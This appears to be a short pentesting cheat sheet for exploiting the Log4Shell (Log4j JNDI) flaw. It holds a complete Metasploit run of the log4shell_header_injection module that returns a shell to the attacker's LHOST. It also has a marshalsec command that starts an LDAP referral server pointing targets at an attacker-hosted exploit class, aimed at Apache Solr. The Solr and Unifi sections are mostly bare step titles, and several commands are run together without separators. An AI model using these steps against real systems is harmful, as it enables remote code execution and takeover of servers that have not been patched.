Log4j Pentesting
msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shellExploit Apache Solr (JNDI)
1. Start LDAP Server on Your Local Terminal 1
sudo apt install mavengit clone https://github.com/mbechler/marshalsec.git cd marshalsecmvn clean package -DskipTestsjava -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"
2. Host the Exploit on Your Local Terminal 2
3. Open Listener on Your Local Terminal 3
4. Send Request the Target Website
Exploit Unifi Network using Log4Unifi
1. Test the Vulnerability in the Target Web Page
2. Open Listener on Your Local Machine
3. Exploit
Last updated